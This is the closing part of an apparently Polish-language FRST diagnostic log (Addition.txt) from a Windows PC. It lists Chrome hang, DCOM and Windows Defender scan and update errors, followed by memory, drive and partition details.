Error: (01/11/2019 01:17:50 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program chrome.exe w wersji 70.0.3538.110 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: c44 Godzina rozpoczęcia: 01d4a9a74f27fff2 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Identyfikator raportu: 7a6f8dcc-9971-4e6f-a9c1-6ba14cc143de Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Dziennik System: ============= Error: (01/11/2019 01:51:23 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/11/2019 01:51:02 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/11/2019 01:50:48 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/11/2019 01:50:39 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami Niedostępny w celu uruchomienia serwera: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (01/11/2019 01:50:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/11/2019 01:50:31 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi TokenBroker z argumentami Niedostępny w celu uruchomienia serwera: Windows.Internal.Security.Authentication.Web.TokenBrokerInternal Error: (01/11/2019 01:50:31 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami Niedostępny w celu uruchomienia serwera: {E48EDA45-43C6-48E0-9323-A7B2067D9CD5} Error: (01/11/2019 01:50:31 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-58M8RK6) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami Niedostępny w celu uruchomienia serwera: {E48EDA45-43C6-48E0-9323-A7B2067D9CD5} Windows Defender: =================================== Date: 2019-01-11 11:49:49.995 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {CD3F0F73-C000-4C8E-BD8A-1A2A4133EEAC} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-11 11:30:14.118 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {30D09998-7ACE-4BF9-8049-B71CC1BD4472} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-10 22:56:29.782 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {BBCA1586-D8A6-4613-B250-050E50E7E10B} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-09 16:39:08.654 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {425B21E1-577F-48A2-B5A4-56E73A041949} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-09 11:50:37.318 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {92AECE5D-C217-4CFE-B66A-38868D660A15} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-11 13:50:25.650 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2019-01-11 13:31:46.241 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2018-12-07 17:45:46.197 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.283.66.0 Źródło aktualizacji: Serwer usługi Microsoft Update Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\SYSTEM Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.15500.2 Kod błędu: 0x80240017 Opis błędu: Podczas sprawdzania aktualizacji wystąpił nieoczekiwany problem. Aby uzyskać informacje na temat instalowania aktualizacji i rozwiązywania problemów z nimi, zobacz Pomoc i obsługę techniczną. Date: 2018-12-07 16:33:06.593 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.283.1.0 Źródło aktualizacji: Serwer usługi Microsoft Update Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\SYSTEM Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.15500.2 Kod błędu: 0x80240022 Opis błędu: Program nie może sprawdzić, czy są dostępne aktualizacje definicji. Date: 2018-12-07 16:33:06.591 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.283.1.0 Źródło aktualizacji: Serwer usługi Microsoft Update Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\SYSTEM Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.15500.2 Kod błędu: 0x80240022 Opis błędu: Program nie może sprawdzić, czy są dostępne aktualizacje definicji. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i3-3110M CPU @ 2.40GHz Procent pamięci w użyciu: 26% Całkowita pamięć fizyczna: 3998.35 MB Dostępna pamięć fizyczna: 2939.46 MB Całkowita pamięć wirtualna: 6046.35 MB Dostępna pamięć wirtualna: 5231.87 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:111.25 GB) (Free:45.2 GB) NTFS \\?\Volume{5e43e2d2-0000-0000-0000-100000000000}\ (Zastrzeżone przez system) (Fixed) (Total:0.54 GB) (Free:0.5 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 5E43E2D2) Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=111.3 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================